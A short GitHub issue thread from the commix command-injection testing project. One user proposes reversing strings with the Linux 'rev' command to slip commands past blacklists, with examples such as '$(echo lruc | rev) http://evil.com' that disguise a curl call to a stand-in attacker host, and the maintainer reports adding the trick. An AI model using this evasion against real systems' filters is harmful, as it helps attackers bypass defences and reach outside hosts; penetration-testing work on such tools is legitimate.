### ISSUE TITLE
Feature Request: Linux Rev Command

### ISSUE THREAD

**Issue by xsuperbug** [commixproject/commix#408]
Linux "rev" function can use to bypass some blacklists. 

For example :

$(echo sl|rev) -> Ls command
$(echo lruc | rev) http://evil.com -> Curl command

**Comment by xsuperbug** [comment]
They can also be used.

`echo sl|rev`
`printf sl|rev`

**Comment by stasinopoulos** [comment]
Done https://github.com/commixproject/commix/commit/7f56f41cbabae0d9d325360a3ce85ebd0d50f5c8
@xsuperbug  better late than never.
